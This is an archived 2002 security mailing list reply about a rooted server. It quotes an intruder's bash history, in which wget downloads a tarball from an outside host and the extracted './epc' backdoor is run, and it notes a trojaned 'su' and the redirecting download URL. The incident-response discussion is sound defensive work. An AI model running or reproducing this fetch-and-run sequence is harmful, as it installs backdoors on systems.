Security Incidents mailing list archives

Re: Rooted, .haos on system

From: Mike Katz <mike () procinct com>
Date: Mon, 16 Dec 2002 11:31:23 -0800

At 12/16/2002 10:47 AM, Damian Gerow wrote:

Left in the .bash_history was this:

        w
        cd /tmp
        wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
        ./epc

A quick check tells me that 'epc' is a backdoor utility, and the other
file contained within loc.tgz looks like a trojaned 'su'.

I've already notified Geocities abuse, and haven't heard back from them
yet.

Note that the file does not appear to be stored on the Geocities site; theGeocities site redirects to http://www.djteckh.com/loc.tgz, which is aYahoo domain.


Michael Katz
mike () procinct com
Procinct Security


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.

For more information on this free incident handling, managementand tracking system please see: http://aris.securityfocus.com

Current thread:

Rooted, .haos on system Damian Gerow (Dec 15)
- Re: Rooted, .haos on system Damian Gerow (Dec 16)
  - Re: Rooted, .haos on system Damian Gerow (Dec 16)
    - Re: Rooted, .haos on system Mike Katz (Dec 16)
    - Re: Rooted, .haos on system zeno (Dec 16)
    - Re: Rooted, .haos on system Carlos Eduardo Pedroza Santiviago (Dec 16)
    - Re: Rooted, .haos on system Damian Gerow (Dec 16)
    - Message not available
    - Re: Rooted, .haos on system Julian Young (Dec 17)
    - New CIFS (port 445) worm? David Gillett (Dec 17)
    - Re: New CIFS (port 445) worm? Zen (Dec 17)
  - Re[2]: Rooted, .haos on system Oliver.C.Rochford CFH (Dec 17)
- Re: Rooted, .haos on system Mattias Hedenskog (Dec 16)
  - Re: Rooted, .haos on system zeno (Dec 16)